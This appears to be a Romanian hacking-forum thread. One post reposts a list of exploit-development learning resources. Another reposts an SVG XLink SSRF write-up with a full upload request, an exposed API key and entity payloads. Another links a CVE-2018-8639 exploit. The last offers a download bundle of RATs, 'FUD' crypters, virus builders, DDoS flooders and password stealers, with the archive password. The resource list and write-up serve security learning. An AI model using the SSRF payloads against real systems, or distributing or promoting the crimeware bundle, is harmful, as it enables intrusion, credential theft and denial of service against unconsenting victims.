Leaderboard

L-am pus aici ca in bookmarks nu prea le gasesc. Sursa: http://www.pentest.guru/index.php/2016/01/28/best-books-tutorials-and-courses-to-learn-about-exploit-development/ The best resources for learning exploit development Exploit development is considered to be the climax in the learning path of an ethical hacker or security professional. It is strongly advisable to have mastered the basics before delving into this topic. Exploit development is hard and it’s not something you learn at school or university (usually), not something any of your geek friends will talk about all day long. Only those who are brave to study hard can achieve the joy of controlling the EIP, popping a shell and taking control of a machine while the oblivious user yells at Microsoft for the nth crash of his beloved program. What are the prerequisites for learning about exploit development? Well, if you want to comprehend and hopefully start developing your own exploits you should have at least a basic knowledge of x86/64 bit system architecture (Windows, Linux or Mac according to your target), low level programming, possibly assembly, C/C++ or Python is fine as well for many tasks, then you should have in mind how the computer memory works (RAM), the concept of stack, heap, CPU registers, the most common operations, system calls, segmentation fault, buffer overflow, race condition and so on. You also should be familiar with disassemblers and a background in reverse engineering or malware analysis may be useful before starting to develop your own exploits. Let’s see some resources that can help you to be prepared before attempting the big jump onto the high level world of exploit development, the Olympus of the Godly Hackers. x86/64 bit system architecture: Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration Assembly language: http://www.drpaulcarter.com/pcasm/ Assembly Language Step-by-Step: Programming with Linux The Art of Assembly Language Windows Assembly Language Megaprimer Assembly Language Megaprimer for Linux C/C++: C Programming Absolute Beginner’s Guide The C Programming Language Introduction to Computer Science CS50x Programming: Principles and Practice Using C++ C++ Primer Accelerated C++: Practical Programming by Example Python: Python has a wonderful official documentation, apart from that you can use the following books/courses: Learn Python the hard way How to think like a computer scientist Learning Python Introduction to computer science and programming using Python MITx 6.00.1x When you feel comfortable with the prerequisites, then you can start learning exploit developmentfollowing these great resources! I compiled a list of books, tutorials, courses, tools and vulnerable applications that you can use for your study. BOOKS Hacking – The art of exploitation A bug Hunter’s Diary: A Guided Tour Through the Wilds of Software Security The Shellcoder’s Handbook: Discovering and Exploiting Security Holes Sockets, shellcode, Porting, and coding: reverse engineering Exploits and Tool coding for security professionals Writing Security tools and Exploits Buffer overflow attacks: Detect, exploit, Prevent Metasploit toolkit for Penetration Testing, exploit Development, and vulnerability research TUTORIALS Corelan.be https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/ https://www.corelan.be/index.php/2010/03/22/ken-ward-zipper-exploit-write-up-on-abysssec-com/ https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ https://www.corelan.be/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/ https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/ https://www.corelan.be/index.php/2012/12/31/jingle-bofs-jingle-rops-sploiting-all-the-things-with-mona-v2/ https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/ https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/ https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/ https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/ Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 exploit research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 buffer overflow exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer Massimiliano Tomassoli’s blog http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/ Samsclass.info https://samsclass.info/127/127_F15.shtml Securitysift.com http://www.securitysift.com/windows-exploit-development-part-1-basics/ http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits http://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows Justbeck.com http://www.justbeck.com/getting-started-in-exploit-development/ 0xdabbad00.com http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/ fuzzysecurity.com Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] sploitfun.wordpress.com https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ sneakerhax.com http://sneakerhax.com/jumping-into-exploit-development/ community.rapid7.com https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development–the-series resources.infosecinstitute.com http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ rafayhackingarticles.net http://www.rafayhackingarticles.net/2011/07/from-minor-bug-to-zero-day-exploit.html Smashing the stack for fun and for profit: revived Automating format string exploits IT-Sec catalog 2.0 (Exploit development) by Arthur Gerkis NCCGroup.trust https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/ Desc0n0cid0.blogspot.it https://desc0n0cid0.blogspot.it/2016/09/stack-based-buffer-overflow.html https://desc0n0cid0.blogspot.it/2016/09/stack-based-buffer-overflow_28.html https://desc0n0cid0.blogspot.it/2016/09/stack-based-buffer-overflow_29.html https://desc0n0cid0.blogspot.it/2016/10/part-4-stack-based-buffer-overflow.html Stack Based Overflow Articles. Win32 Buffer Overflows (Location, Exploitation and Prevention) – by Dark spyrit [1999] Writing Stack Based Overflows on Windows – by Nish Bhalla’s [2005] Heap Based Overflow Articles. Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002] Exploiting the MSRPC Heap Overflow Part 1 – by Dave Aitel (MS03-026) [September 2003] Exploiting the MSRPC Heap Overflow Part 2 – by Dave Aitel (MS03-026) [September 2003] Windows heap overflow penetration in black hat – by David Litchfield [2004] Kernel Based Exploit Development Articles. How to attack kernel based vulns on windows was done – by a Polish group called “sec-labs” [2003] Sec-lab old whitepaper Sec-lab old exploit Windows Local Kernel Exploitation (based on sec-lab research) – by S.K Chong [2004] How to exploit Windows kernel memory pool – by SoBeIt [2005] Exploiting remote kernel overflows in windows – by Eeye Security Kernel-mode Payloads on Windows in uninformed – by Matt Miller Exploiting 802.11 Wireless Driver Vulnerabilities on Windows BH US 2007 Attacking the Windows Kernel Remote and Local Exploitation of Network Drivers Exploiting Comon Flaws In Drivers I2OMGMT Driver Impersonation Attack Real World Kernel Pool Exploitation Exploit for windows 2k3 and 2k8 Alyzing local privilege escalations in win32k Intro to Windows Kernel Security Development There’s a party at ring0 and you’re invited Windows kernel vulnerability exploitation Windows memory protections Introduction Articles. Data Execution Prevention /GS (Buffer Security Check) /SAFESEH ASLR SEHOP Windows memory protections Bypass Methods Articles. Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002] Creating Arbitrary Shellcode In Unicode Expanded Strings – by Chris Anley Advanced windows exploitation – by Dave Aitel [2003] Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server – by David Litchfield Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) – by Matt Conover in cansecwest 2004 Safely Searching Process Virtual Address Space – by Matt Miller [2004] IE exploit and used a technology called Heap Spray Bypassing hardware-enforced DEP – by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005] Exploiting Freelist[0] On XP Service Pack 2 – by Brett Moore [2005] Kernel-mode Payloads on Windows in uninformed Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting Comon Flaws In Drivers Heap Feng Shui in JavaScript by Alexander sotirov [2007] Understanding and bypassing Windows Heap Protection – by Nicolas Waisman [2007] Heaps About Heaps – by Brett moore [2008] Bypassing browser memory protections in Windows Vista – by Mark Dowd and Alex Sotirov [2008] Attacking the Vista Heap – by ben hawkes [2008] Return oriented programming Exploitation without Code Injection – by Hovav Shacham (and others ) [2008] Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 – by Cesar Cerrudo [2008] Defeating DEP Immunity Way – by Pablo Sole [2008] Practical Windows XP2003 Heap Exploitation – by John McDonald and Chris Valasek [2009] Bypassing SEHOP – by Stefan Le Berre Damien Cauquil [2009] Interpreter Exploitation : Pointer Inference and JIT Spraying – by Dionysus Blazakis[2010] Write-up of Pwn2Own 2010 – by Peter Vreugdenhil All in one 0day presented in rootedCON – by Ruben Santamarta [2010] DEP/ASLR bypass using 3rd party – by Shahin Ramezany [2013] Typical windows exploits Real-world HW-DEP bypass Exploit – by Devcode Bypassing DEP by returning into HeapCreate – by Toto First public ASLR bypass exploit by using partial overwrite – by Skape Heap spray and bypassing DEP – by Skylined First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability Exploit codes of bypassing browsers memory protections PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 – by Cesar Cerrudo PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 – by Cesar Cerrudo An exploit works from win 3.1 to win 7 – by Tavis Ormandy KiTra0d Old ms08-067 metasploit module multi-target and DEP bypass PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass SMBv2 Exploit – by Stephen Fewer TRAININGS Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Module 12 of Advanced penetration testing cource on Cybrary.it https://www.cybrary.it/course/advanced-penetration-testing/ Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer infiniteskills.com http://www.infiniteskills.com/training/reverse-engineering-and-exploit-development.html COURSES Corelan https://www.corelan-training.com Offensive Security https://www.offensive-security.com/information-security-training/advanced-windows-exploitation/ AWE (Advanced Windows Exploitation) SANS https://www.sans.org/course/advance-exploit-development-pentetration-testers SANS SEC760: Advanced Exploit Development for Penetration Testers Ptrace Security http://www.ptrace-security.com/training/courses/advanced-software-exploitation/ Advanced Software Exploitation Udemy https://www.udemy.com/windows-exploit-development-megaprimer/learn/#/Windows exploit Development Megaprimer by Ajin Abraham VIDEOS LiveOverflow Youtube channel TOOLS IDA Pro – Windows disassembler and debugger, with a free evaluation version. OllyDbg – An assembly-level debugger for Windows executables. WinDbg – Windows debugger Mona.py – Immunity debugger helper angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab. BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi – Binary analysis IDE for reverse engineering based on graph visualization. Bokken – GUI for Pyew and Radare. Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro – Web based code browser using clang to provide basic code analysis. dnSpy – .NET assembly editor, decompiler and debugger. Evan’s Debugger (EDB) – A modular debugger with a Qt GUI. GDB – The GNU debugger. GEF – GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols. Immunity Debugger – Debugger for malware analysis and more, with a Python API. ltrace – Dynamic analysis for Linux executables. objdump – Part of GNU binutils, for static analysis of Linux binaries. PANDA – Platform for Architecture-Neutral Dynamic Analysis PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio – Perform static analysis of Windows executables. Process Monitor – Advanced monitoring tool for Windows programs. Pyew – Python tool for malware analysis. Radare2 – Reverse engineering framework, with debugger support. SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace – Dynamic analysis for Linux executables. Udis86 – Disassembler library and tool for x86 and x86_64. Vivisect – Python tool for malware analysis. X64dbg – An open-source x64/x32 debugger for windows. afl – American Fuzzy Lop fuzzer gef – enhanced gdb debugger honggfuzz – general purpose fuzzer libheap – python gdb library for examining glibc heap (ptmalloc) pwndbg – enhanced gdb framework for exploit development pwntools – exploit development and CTF toolkit qira – parallel, timeless debugger ropper – rop gadget finder rp++ – rop gadget finder xrop – rop gadget finder shellnoob – shellcode writing helper shellsploit – exploit development toolkitSploitKit – a suite of cli tools to automate the tedious parts of exploit development ROP Injector – rop injector HEAP EXPLOITATION TECHNIQUES https://github.com/shellphish/how2heap VULNERABLE APPLICATIONS Exploit-exercises.com https://exploit-exercises.com/protostar/ Protostar https://exploit-exercises.com/fusion/ Fusion StackSmash – A collection of toy programs for teaching buffer overflow vulnerabilities CTF-Workshop – challenges for binary exploitation workshop28 hacking sites to practise your skills in a legal wayhttps://www.peerlyst.com/blog-post/practise-your-infosec-skill-on-these-legal-28-hacking-sites EXPLOITS DATABASE https://www.exploit-db.com https://www.milw00rm.com http://0day.today https://packetstormsecurity.com http://www.securityfocus.com http://www.windowsexploits.com http://iedb.ir http://www.macexploit.com COLLABORATE! Do you have other fantastic resources to share that could be part of this list? Then check out my projecton Github and send me a pull request!

Alt exemplu , intr-un context diferit. Nu ca as fi nationalist, dar researcher-ul e roman si a raportat tipul asta de vulnerabilitate inaintea lu' Hussain.

Ce pula mea sunt astea?

SVG XLink SSRF fingerprinting libraries version Arbaz Hussain Mar 2 SSRF(Server-side-request-forgery) have been quite a popular attack surface for the uploading functionality where application fetches the assets from external resources in form of images,documents etc SVG is an XML based vector image used to display a variety of graphics on the Web and other environments, due it ’s XML structure it supports various XML features, one of the feature is XLink which is responsible for creating internal and external links within XML document. During the testing process, I encountered with XLINK based SSRF to enumerate various internal libraries, installed tools, gnome version’s, much more etc, POST /upload HTTP/1.1 Host: redacted.com Connection: close Content-Length: 1313 Accept: application/json, text/javascript, */*; q=0.01 Origin: https://redacted.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN Referer: https://redacted.com Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="timestamp" 1551244304 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="api_key" 413781391468673 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="file"; filename="test.jpg" Content-Type: image/jpeg <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="30" width="30" xlink:href="http://myserver:1337/" /></svg> Incoming Request at my server: Interestingly referer header shows the request has been generated from an internal network of the application which is hosting app over port 3000 Since the application is accepting SVG based images, the second try would be to include the static entities to see if the parser is allowing custom entities. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE testingxxe [ <!ENTITY xml "POC for Static Entities Allowed">]> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <text x="0" y="20" font-size="20">&xml;</text> </svg> As parser is allowing static entities, Next step would be to include SYSTEM based entities along with DTD to fetch the malicious DTD which is more like XXE attack but parser was blocking system based entities in the backend, they had strong validation of the malicious malformed XML. Since parser is blocking SYSTEM based entities our attack surface has been limited, Now it’s time to test Billion Laughs attack since application allowed static entities. Always note that: Before blinding fuzzing the various XML payloads, make sure to understand the parser logic, Before trying the billion laugh attack, I threw the server with simple callback entity function to see if the parser allows rendering of xml1 entity through callback of xml2 entity. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE testingxxe [ <!ENTITY xml1 "This is my first message"> <!ENTITY xml2 "&xml1";> ]> <text x="0" y="20" font-size="20">&xml2;</text> </svg> Unfortunately, the parser is blocking the callback entities as well. Now our attack surface is at ground level (Picture present fingerprint trick) by including the internal path along with picture present in system & we get interaction if that picture present internally on the system as described by @flyod at https://hackerone.com/reports/223203 In order to enumerate all possible things, we need to build a wordlist for all possible local pictures present on the system. Now it’s time to make different port’s open or just with different paths& fuzz it along with all the internal picture path’s collected to fingerprint all possible libraries, script, tools installed along with versions. Arbaz Hussain ~Kiraak-Boy~ Sursa: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c

CVE-2018-8639-exp platform: windows 2008 and windows 2008 R2 Sursa: https://github.com/ze0r/CVE-2018-8639-exp/

Remote Administration Tools/Trojans 1. Cerberus 1.03.4 BETA 2. Turkojan 4 GOLD 3. Apocalypse 1.4.4 4. Spy-Net 2.6 5. Pro Rat v1.9 6. Poison Ivy 2.3.2 7. Bandook Rat v1.35 8. Bifrost v1.0 9. CyberGate v.1.01.0 10. Lost Door v4.2 LIGHT 11. Beast 2.07 12. Shark v3.0.0 13. Sub7 v2.2 14. Pain RAT v0.1 15. xHacker Pro v3.0 16. Seed v1.1 17. Optix Pro v1.33 18. Darkmoon v4.11 19. CIA v1.3 20. Y3k RAT v1.0 21. MiniMo RAT v0.7 22. NetDevil v1.0 23. Deeper RAT v1.0 24. Schwarze Sonne RAT 0.1 Public Beta 2 25. Schwarze Sonne RAT 0.7 26. Schwarze Sonne RAT 0.8 27. Schwarze_Sonne_0.5_Beta 28. Schwarze Sonne RAT 0.2 Beta 29. [bUGFIX]SS-RAT 0.4 Final 30. A32s (fifth) RAT 31. Arctic R.A.T. 0.0.1 Alpha 32. CyberGate v1.02.0 33. CyberGate v1.03.0 34. CyberGate v1.04.8 35. CyberGate_v1.01.8 36. CyberGate-v1.00.0 37. Daleth RAT 1.0(ss rat src) 38. DarkComet2RC1 39. DarkComet2RC5 40. DarkComet-RAT 2.0 Final 41. DarkComet-RAT 2.0 Final RC2 42. DarkComet-RAT 2.0 LAST BETA 43. DarkComet-RAT 2.0b3 44. DarkComet-RAT 2.0b 2 45. Deeper 1.0 Beta10 - Fix1 46. Deeper_1.0_Beta8 47. Deeper_1.0_Beta9 48. DRAT 2009 V4.0 Build 1201 49. DRAT 2009 V4.2 Build 1216 50. Golden Phoenix Rat 0.2 52. GraphicBooting RAT Beta v0.3 53. Lost Door V2.2 Stable Public edition 54. Lost Door v4.3.1 55. miniRAT 0.6 Beta 56. NovaLite_final5 57. Pocket RAT 58. Spy-Net 2.7 59. SS-RAT 0.5 Final 60. SS-RAT 0.6 Final_bugfix 61. SS-RAT 0.6 Public Beta 62. Vanguard 63. Venomous Ivy 64. VorteX RAT 65. Xtreme RAT v1.0 66. Remote Administrator (Radmin) v3.1 Cracked 75. MofoTro 76. Arabian-Attacker v1.2.2 77. Arabian-Attacker v1.4.0 78. Archelaus Beta 79. Arctic R.A.T. 0.0.1 Alpha 80. Arctic R.A.T. 0.1 81. Char0n 82. Erebus v1.0.2 Private Cracked 83. Nytro Rat + Source Code -- Binders: 1. UniProject Binder 2. Sh!t Multi Binder 3. bl0b Binder + Unique Stub Generator 4. Sadaf Binder 5. vBinder 6. KBW Binder 7. SaLiXeM Binder 8. YAB Binder V2.01 9. EES Binder V1.0 10. Albertino Binder 11. Rapid Binder v 1.0[ultimate Files To Bind] - 100 % FUD 12. BlackHole Binder 13. F.B.I. Binder 14. Predator 1.6 15. PureBiND3R by d3will 16. Schniedelwutz Binder 1.0 17. Simple Binder by Stonedinfect 18. sp1r1tus Binder 1.0 19. Tool-Store Binder 1.0 20. Tool-Store Toasty Binder 1.0 21. Yet Another Binder 2.0 -- Crypters 1. Carb0n Crypter v1.8 2. Fly Crypter v2.2 + Unique Stub Generator 0.6 3. JCrypter 4. Triloko Crypter 5. Halloween Crypter 6. Deh Crypter 7. Hatrex Crypter 8. Octrix Crypter 9. NewHacks Crypter 10. Refruncy Crypter 11. Polifemo Ebrio Crypter 12. Infinity Crypter 13. Hallow's Scantime Crypter 14. Daemon Crypt v2.0 15. NTPacker 16. El Bruto Crypter V2 17. [FUD] 146, crypter/packer/downloader/startup 18. iCrypt Abronsius Edition 19. Simple ASM Crypter 20. XxVtecman9xX_Crypter 21. Grenade Crypter (NEW) 22. Sick Crypter 23. Sikandar's_Crypter_Version_1.0_Public 24. Bifrost Crypter by ArexX 2 25. Cryptable Seduction 1.0 by DizzY 26. Crypter by Permabatt 27. Crypter bY YoDa 28. Cryptic 1.5 29. Deception 4 by [RaGe] [Favorite ] 30. Destructor Crypter 31. EXECrypt 1 M0d by CARDX 32. Fuzz Buzz 1.2 by BulletProof 33. OSC-Crypter by haZl0oh M0d 34.Poison Ivy Crypt M0d by CARDX 35. SaW V1 Mod by LEGIONPR 36. Skorpien007 Crypter 3.1 37. Stonedinfect Crypter 1.0 38. Trojka Crypter 1.1 by tr1p0d 39. Deception 4 by [RaGe] -- Virus Builders 1. Nathan's Image Worm 2. Dr. VBS Virus Maker 3. p0ke's WormGen v2.0 4. Vbswg 2 Beta 5. Virus-O-Matic Virus Maker 6. Kill Switch v1.0 7. TeraBIT Virus Maker v2.8 8. Hell P2P Worm Generator v1.8 9. Shadow Batch Virus Gen [5.0.0 10.DELmE's Batch Virus Generatorv2.0 -- Scanners 1. DD7 Port Scanner 2. SuperScan 4.0 3. Trojan Hunter v1.5 4. ProPort v2.2 5. Bitching Threads v3.1 6. Blue's Port Scanner V5 7. Angry IP Scanner 2.21 8. XSS Scanner 9. TE Port Scanner 10. Free IP Scanner 11. Bobup Scanner v2.1.2 12. Advanced IP Scanner 13. Advanced Port Scanner 14. Bitching Threads 15. LanSpy 16. NeoTracePro 17. NetScanTools 18. ProPort 19. Putty v0.6 20. SuperScan 21. ZenMap - Nmap v5.21 [Win] -- DoSers, DDoSers, Flooders and Nukers 1. rDoS 2. zDoS 3. Site Hog v1 4. SYN Flood 5. BFF DoS 6. Good Bye v3.0 7. RPCNuke 1.0 8. Rocket v1.0 9. Panther Mode 2 10. Final Fortune 2.4 11. Click v2.2 12. BattlePong 13. Assault V1.0 14. Supernova V5 DDos Tool ( VIP ) 15. HTTP Flood Denial of Service (DoS) Testing Tool 16. iGirls DoS Tool [Free] 17. Longcat Flooder 2.3 (DoS Tool) 18. DoS v5.5 (Denial Of Service) 19. Counter strike style DoS 20. XDos, Dos Tool 21. t3c4i3 Dos Tool v2.00 [updated 9/3/2010] 22 BioHazard DoS 2 23. BioHazard DoS (TCP) 24. FubarDoS - DoS tool now public 25. Black Mamba Dos Attacker 13Mb/s 26. ~FuCk It!~ DOS 27. NetBotAtt14En 28. Click v2.2 29. Spoofed IRC Nuker v1.3 30. Hartz4Flooder v0.2 31. Bitslap 32. Crazyping v1.1 33. Killme v1.0 34. Bd0rk's DoS killer 35. Krate port bomber 36. Fed up v2.0 37. Gimp 38. Muerte v2.1 39. Kaput v1.0 & beta v1.5 40. Donut http flooder v1.4 41. Blood lust 42. Hospitables nuker v2.2 43. Bitchslap v1.0 44. Razors DoS tool v1.1 45. Try2DdoS 46. Firewall killer v1.3 47. Death n destruction 48. Assault v1.0 49. NetBot Attacker v1.4 English 50. Panteher v2.0 51. Battle Pong 52. Nemesy v1.3 53. Meliksah nuke v2.5 54. Inferno Nuker 55. Igmp nuke v1.0 56. Server attack Ddos 57. DENDEN DDoS PROJECT V.1 58. MegaD34TH - DDOS / Scan / Attack / Freeze tool! 59. xFatex DDOS Network/server Flooder 60. {??} SuPeRdOS {??} 61. Website_Crasherv4.7 62. IFRAME_DDoS_v1.0 63. IP Port Ddos 64. IRAN DoS -- Stealers 1. Dark Screen Stealer V2 2. Dark IP Stealer 3. Lab Stealer 4. 1337 Steam Stealer 5. Multi Password Stealer v1.6 6. Firefox Password Stealer 7. PassStealer v3.0 8. PWStealer V2.0 9. Universal1337 V2 10. Lord PS 11. JPS 1.8 12. spam Stealer 13. Aura Stealer v1.0b 14. BKL Stealer V2.0 15. spam Stealer/Keylogger 16. iStealer 3.0 17. iStealer 4.0 18. iStealer 5.0 (MOD) 19. Midnight Stealer 1.5 20. Ref Stealer v1.0 21. Remote Penetration v2.2 22. SimpleStealer v1.2 23. Unlimited PW Stealer v0.4 24. iStealer 6.3 25.1337 SteamACC Stealer Private 26.Allround Stealer 27. Armageddon Stealer 1.0 by Krusty 28. bl0b Recovery 1.0 29. Blade Stealer 1.0 PUBLIC 30.Codesoft PW Stealer 0.35 31. Codesoft PW Stealer 0.50 32. Dark Screen Stealer 2 33. Dimension Stealer 2 by Gumball 34. FileZilla Stealer 1.0 PUBLIC 35. FileZilla Stealer by Stonedinfect 36. Firefox Password Stealer - Steamcafe 37. Fly Stealer 0.1 38. Fudsonly Stealer 0.1 39. Hackbase Steam Phisher 1.2 BETA 40. spam 0.0.1.4 41. spam Stealer 42. HardCore Soft 0.0.0.1 43. ICQ Steal0r 44. IStealer 4.0 45. IStealer 6.0 Legends 46. LabStealer by Xash 47. Multi Password Stealer 1.6 48. Papst Steale.NET 49. Pass Stealer 3.0 50. Pesca Stealer 0.2 51. pixel Stealer 1.3.0 SC 52. pixel Stealer 1.4.0 53. ProStealer 54. Public Firefox 3 Stealer 51. Pure-Steam 1.0 CS 52. Pw Stealer by Killer110 53. Remote Penetration 2.2 54. SC LiteStealer 1 55. SimpleStealer 2.1 56. SPS Stealer 57. SStealer by till7 58. Steam Stealer 1.0 by ghstoy 59. Steam Stealer by till7 60. Stupid Stealer 6 mit PHP Logger 61. System Stealer 2 62. The Simpsons Stealer 0.2 63. Tool-Store FileZilla Stealer 1.0 64. Ultimate Stealer 1.0 65. Universal1337 - The Account Stealer 63. Universal1337 3 -- -- Sql Injection Tools 1.Vbulletin 3.6.5 Exploit 2.sqliHelper 2.7 3.sqli column counter 4.exploit scanner 5.cpanel bruteforcer 6.blind Sqli 7.admin finder 8.SQLDEFACER 9.MySQLi_Dumper_v.1.2 10.GYNshell.php 11.Acunetix.Web.Vulnerability.Scanner.Enterprise.E dition.v6.0-EDGE 12.Havij 1.08 - Advanced SQL Injection Tool 13.Hexjector v1.0.7.3 Special Edition 14.SQL ExploitScanner V3 Rebuild Version 15.SQL Exploiter Professional v2.15 16.Pangolin 3.2.1.1020 Released 17.SQL Injection Tool v2.1 18.SQL Power Injector 1.2 Rar password: Spy-Net Download : DepositFiles

Da-i t/c Asta foloseste key-urile si apoi le posteaza aici, cica ne ajuta.